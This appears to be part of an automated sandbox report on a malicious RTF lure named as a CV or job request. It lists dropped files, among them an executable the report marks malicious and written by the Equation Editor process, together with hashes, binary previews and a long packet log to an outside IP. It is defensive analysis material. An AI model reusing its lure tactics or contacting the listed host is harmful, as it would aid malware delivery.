                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....xa..............0.............>.... ... ....@.. .......................`............@.....................................O.... .......................@....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................ .......H..................t....|..............................................&.(......*...0..H.............s..........~..........(......~.........,.s.............,..(......*........#<.......0.............+..*..0...........s.....+..*..0...........sR....+..*..0...........sT....+..*..0...........s.....+..*..0...........s.....+..*..0...........s.....+..*..0...........s.....+..*...}......}.....(.......r...p}....*z..}......}.....(........}....*...}......}.....(........}......}....*...}.
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: Composite Document File V2 Document, Cannot read section info
Category: dropped
Size (bytes): 177152
Entropy (8bit): 7.968894553436934
Encrypted: false
SSDEEP: 3072:5r+OFkZ8MtvknSS6grNZM3dVeqIoUxnVWWwRJZgaepJWma515A:5x27JkSS6KNZSXVnWSoaKam
MD5: A6222C96BEC0E96BECCD2EF405CBC8C4
SHA1: 442B799CBCA7A1D526C31AB2B82C0C3E452AFF23
SHA-256: 6F64549B2D015CCA2E0CCDBAAFE166640C004367D2F75B316D7620EEB597083C
SHA-512: 3FAADCE5A243020431C5B191ABE03610AECA2AA6271C6E5B040749F5A510FA6BB929F0B722D0D1C2047F2D00F1C319284AC1268659BC22FB5E6F5799C4ED88A9
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: low
                                              Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................W........................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7F12DB12-48BF-46DA-B084-D7B910635C9B}.tmp
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 1024
Entropy (8bit): 0.05390218305374581
Encrypted: false
SSDEEP: 3:ol3lYdn:4Wn
MD5: 5D4D94EE7E06BBB0AF9584119797B23A
SHA1: DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256: 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512: 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious: false
Reputation: high, very likely benign file
                                              Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{99A74BA1-7084-4250-8A29-E85A11395DDC}.tmp
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 13312
Entropy (8bit): 3.5864344325374753
Encrypted: false
SSDEEP: 384:db9nvMlWW4cPwZY8APS+oX9Y52wBvvTKBkZ:db9nvsgcPwOPUY5HBGBkZ
MD5: 99BD4E7DE3940A04A671C43E8132D001
SHA1: 8518B09DEDC04133804F6E6F538C83A2FACC0208
SHA-256: FB31FF316F5CD02FA92BB0153268076174D356631D2AF4B8D41F5231720ABEAB
SHA-512: BC6D7FD0AE073CE562A627E0F7C060F4CB1898CDD34F9B53251B3FBC507A132BDEA824E34EE33A8091D95197C5B66FEEE1BA0AF1328F0B0A7AE653CFA11E4633
Malicious: false
Reputation: low
                                              Preview: ).=.7.#.%.&.1.?.0.>.3.`.,.(.?.5.-.7.`.!.9.=.).9...).1.?.$.`.!.].6.?.`.|.`.4.?.%.<.0.....3.#.3.5.4.8.?.-.<.,.8.%.*.+.?.!.9.5.=.2.[.@.3.5.0.'.0.>...9.!.&.-.6.?.3.5.#.4.~./...+.,.=.|.].(.7.5.1.].<.?.%.?.6...].|.6.#.-.].6.^.0...?.~.*.,.9.*.7.6.`.7.8._.?./.$.?.`...%.2.2.9.1.*...~.!.~.....).1.$.'.'.?.>.2..._.).@.?.6.+.>.>.-.5...$.-.?.#.`.5...*.(.1.#.^.|.'.$.?.+.#.&.&.7...|.2.=.?.^.!.#.(...'.^..._...`./.;.).@.`.0.9.|.%.&.|.-.&.9.&.8.'.`...=...).:.>.&.[.[.>...#.).^.%.`.7.3.2.3.`.`.?.].?.4.,.^.6.-.]...?.2.?...$.`.[.-.(.#._.!.].#.?.<.;.-.<.?.~.[.^.%...$.?.?...$.<.%.^.9.6.#.!.@.9.~.&.?.7.).-.^.?._.?.(.8.-.?...?.2.;.|.^.^.|.%.9.?.%._...?.&.].6.[.:...?...#.,.~.:.>...;.%.'.#.+.,._.2.?._.?.*.[.@.&.,.9.)...9.^.>.;./.:.&.$.!.^.4.8...=.).9.'.(.?.?.+.1.1.*.[.8.?.2.+.%.0.>.%...^.0.*.%.~.(.6.~...#.*.:.,.8.<.[.).6.+.1.5.6.$.:._.'.).@...#.!.0...%.].8...6.4.!.`.8...&.8._.#.|.[./...|...9.,.4.?.<.[.9.@.(.3...|.3...;.^.4.`.[.^.1.0.%.:.?.%.:.9.^.|.%.=.[.`.9.?.=.8.(.8.>.`.?.-.?.3...%.?./.,...;.<.(.3.?.2.`.^.?.;.6.
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{BE99F549-07B9-491A-8DB9-68BEA2AC23A8}.tmp
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 1536
Entropy (8bit): 1.3586208805849453
Encrypted: false
SSDEEP: 3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbu:IiiiiiiiiifdLloZQc8++lsJe1Mz1/
MD5: 3DEAB1D660801EC3E5A2A85121BD0100
SHA1: AA76E24361F626EB979536BF41369287FE7F6444
SHA-256: 682A68677DC3D843BDF8F1F3A3CF56B748E35B976F4AD01115619A6CD080BC7D
SHA-512: 4F5A6BA6878C88BD08B726EB71FA0C7682E78DC5DA93CE63C33290C8A2F9375CD94FFC2C3BADEF6A04C1AC7CFBE0EFAE7BB945F2D9B1A1BBB60F80F9CB84A072
Malicious: false
Reputation: low
                                              Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\C.V_Job Request.LNK
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:58 2021, mtime=Mon Aug 30 20:08:58 2021, atime=Wed Oct 27 22:42:17 2021, length=445393, window=hide
Category: dropped
Size (bytes): 1039
Entropy (8bit): 4.5731093684743485
Encrypted: false
SSDEEP: 24:8P8G0n/XTuzLIZ+GLNJeGOLzDv3qoE/7Eg:8P8G0n/XTkuNJi6oWB
MD5: 66DF0B78A634B21C0034107A4983E87D
SHA1: 3FD37B0E445CB40504527400517ECACB0C9EB0FD
SHA-256: 5A4483E851FB70C0B2AC567FADD2AFBEDC73F22E1CD83A0B744D8C7C4532C2EF
SHA-512: 8FB8421FF12EBC63933F961D0465D2F1A368C9E0569BD34D006C9EF81466BB674F7C49E403DF748EE7B76A3C4E0ECE515D4604CE7E9F7C7ACD80E9878F170472
Malicious: false
                                              Preview: L..................F.... ......?......?....^.F.................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S ...user.8......QK.X.S .*...&=....U...............A.l.b.u.s.....z.1......S!...Desktop.d......QK.X.S!.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....p.2.....[SI. .CV_JOB~1.DOC..T.......S ..S .*.........................C...V._.J.o.b. .R.e.q.u.e.s.t...d.o.c.......}...............-...8...[............?J......C:\Users\..#...................\\715575\Users.user\Desktop\C.V_Job Request.doc.*.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.C...V._.J.o.b. .R.e.q.u.e.s.t...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......715575..........D_....3N...W...9..g..........
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 81
Entropy (8bit): 4.796519991888395
Encrypted: false
SSDEEP: 3:bDuMJl+LzBXo2mX1Z8Xo2v:bCBlS+L
MD5: B78115C5999CBD22895610ED925C66F5
SHA1: 1EFDA182CFA86793A126100070301C1D1AD4C40C
SHA-256: BEFE43765F3B3397789933ACDC7CAF5C0F3591BC8803A65DA48171831985985F
SHA-512: 1412AB4C2A622BFB8BD89DBC36277F6025E7823614C25B6BD5B3305D8B26B5BD9A0CF31913EB70998A1551EE2485DFDA512364765994D84E72CAD11A469AD827
Malicious: false
                                              Preview: [folders]..Templates.LNK=0..C.V_Job Request.LNK=0..[doc]..C.V_Job Request.LNK=0..
                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):162
                                              Entropy (8bit):2.5038355507075254
                                              Encrypted:false
                                              SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                              MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                              SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                              SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                              SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                              Malicious:false
                                              Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                              C:\Users\user\AppData\Roaming\seasonhd72463.exe
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):526336
                                              Entropy (8bit):7.5320170434389455
                                              Encrypted:false
                                              SSDEEP:12288:PG9ImHKQ6MQ0vN3h4Ip/uzEcrPuRj42GT:eJGA3h4Ip/uzrPAbG
                                              MD5:9227463FFB6E37D271919E06D175EDA7
                                              SHA1:549CCA1BD4031F3D302832754A1F3E51FFED065F
                                              SHA-256:5E529CBB901ACED8A6AF49250AFD3D67E059D717D7ECF3EDC32E18A9D549361C
                                              SHA-512:3C2673D5CA3BE9C723B8D34185299459A53F0D99B3F8ABD2821B73299D6DE83257CD4E850AC635C53598EB8CBD9574EE103B781C7C6952B69F2C6EE8C9B3E60B
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 23%
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....xa..............0.............>.... ... ....@.. .......................`............@.....................................O.... .......................@....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................ .......H..................t....|..............................................&.(......*...0..H.............s..........~..........(......~.........,.s.............,..(......*........#<.......0.............+..*..0...........s.....+..*..0...........sR....+..*..0...........sT....+..*..0...........s.....+..*..0...........s.....+..*..0...........s.....+..*..0...........s.....+..*...}......}.....(.......r...p}....*z..}......}.....(........}....*...}......}.....(........}......}....*...}.
                                              C:\Users\user\Desktop\~$V_Job Request.doc
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):162
                                              Entropy (8bit):2.5038355507075254
                                              Encrypted:false
                                              SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                              MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                              SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                              SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                              SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                              Malicious:false
                                              Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                              Static File Info

                                              General

                                              File type:Rich Text Format data, unknown version
                                              Entropy (8bit):4.2248396949078435
                                              TrID:
                                              • Rich Text Format (5005/1) 55.56%
                                              • Rich Text Format (4004/1) 44.44%
                                              File name:C.V_Job Request.doc
                                              File size:445393
                                              MD5:b5be29921304476377e096c60a3fb418
                                              SHA1:653d40c3e86feb11b1cc6b7745257754c296c109
                                              SHA256:fd4e52557f511c596e0d0ff58a1a7775a1295889461b73856d4aa733108e7b58
                                              SHA512:987cb27f1b49978d5dae764d61f4a0af9dff31d073e1d2a28c4d2ac2ee1a9772ef5d337878ca1e7fb18aa8d1f67affcd586336b066afff52ad46ce250de4ff97
                                              SSDEEP:6144:XTaxUCbwi30ctNoGw+JhzjbLq1M4iZsuj36wk7OMwBd6c11ONcwB9sal13uxHGMp:X2xUIwvuoD+nfh44xj06T66ObstGcL
                                              File Content Preview:{\rtf7661)=7#%&1?0>3`,(?5-7`!9=)9.)1?$`!]6?`|`4?%<0..3#3548?-<,8%*+?!95=2[@350'0>.9!&-6?35#4~/.+,=|](751]<?%?6.]|6#-]6^0.?~*,9*76`78_?/$?`.%2291*.~!~..)1$''?>2._)@?6+>>-5.$-?#`5.*(1#^|'$?+#&&7.|2=?^!#(.'^._.`/;)@`09|%&|-&9&8'`.=.):>&[[>.#)^%`7323``?]?4,^6

                                              File Icon

                                              Icon Hash:e4eea2aaa4b4b4a4

                                              Static RTF Info

                                              Objects

                                              Id | Start | Format ID | Format | Classname | Datasize | Filename | Sourcepath | Temppath | Exploit
                                              0 | 000018C9h | | | | | | | | no
                                              1 | 0000187Ch | 2 | embedded | a | 175616 | | | | no

                                              Network Behavior

                                              Network Port Distribution

                                              TCP Packets

                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                              Oct 27, 2021 16:42:18.107542038 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.107572079 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.107599974 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.107644081 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.107655048 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.107685089 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.107711077 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.107754946 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.107764959 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.107795954 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.108923912 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.109092951 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.109141111 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.109158039 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.109193087 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.109215021 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.109267950 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.113636971 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.114095926 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.115237951 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.133426905 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.133491993 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.133589983 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.134902000 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.135011911 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.135052919 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.135071993 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.135098934 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.135127068 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.135190010 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.135215998 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.135257006 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.135277033 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.135305882 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.135330915 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.135382891 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.135459900 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.135502100 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.135544062 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.135559082 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.135593891 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.135618925 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.135658979 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.135677099 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.135713100 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.135735035 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.135775089 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.135792971 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.135832071 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.135850906 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.135901928 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.135915995 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.135957003 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.135994911 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.136009932 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.136017084 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.136059999 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.136086941 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.136120081 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.136148930 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.136178970 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.136256933 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.136276007 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.136322021 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.136353016 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.136409044 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.136420965 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.136615038 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.136657000 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.136674881 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.136707067 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.136733055 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.136778116 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.136795998 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.136833906 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.136910915 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.136995077 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.137072086 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.137082100 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.139739037 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.140887976 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.160470009 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.160521030 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.160607100 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.160629034 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.163122892 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.163168907 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.163240910 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.163258076 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.163902044 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.163944006 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.163983107 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.164005041 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.164021015 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.164060116 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.164098978 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.164128065 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.164159060 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.164176941 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.164217949 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.164237022 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.164268017 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.164303064 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.164340973 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.164361954 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.164391994 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.164412975 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.164450884 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.164469004 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.164499998 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.164522886 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.164560080 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.164582014 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.164609909 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.164632082 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.164671898 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.164689064 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.164720058 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.164747000 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.164786100 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.164825916 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.164844036 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.164882898 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.164932013 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.164951086 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.165004015 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.165015936 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.165055037 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.165093899 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.165111065 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.165142059 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.165160894 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.165184021 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.165221930 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.165244102 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.165275097 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.165298939 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.165338039 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.165365934 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.165401936 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.165411949 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.165468931 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.165484905 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.165530920 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.165564060 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.165627956 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.165643930 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.165694952 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.169127941 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.170581102 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.187757015 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.187812090 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.187915087 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.190952063 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.191092968 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.191152096 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.191195965 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.191229105 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.192872047 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.192924023 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.192982912 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.193001986 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.193072081 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.193084002 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.193128109 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.193165064 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.193209887 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.193242073 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.193272114 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.193305969 CEST80491652.56.59.211192.168.2.22
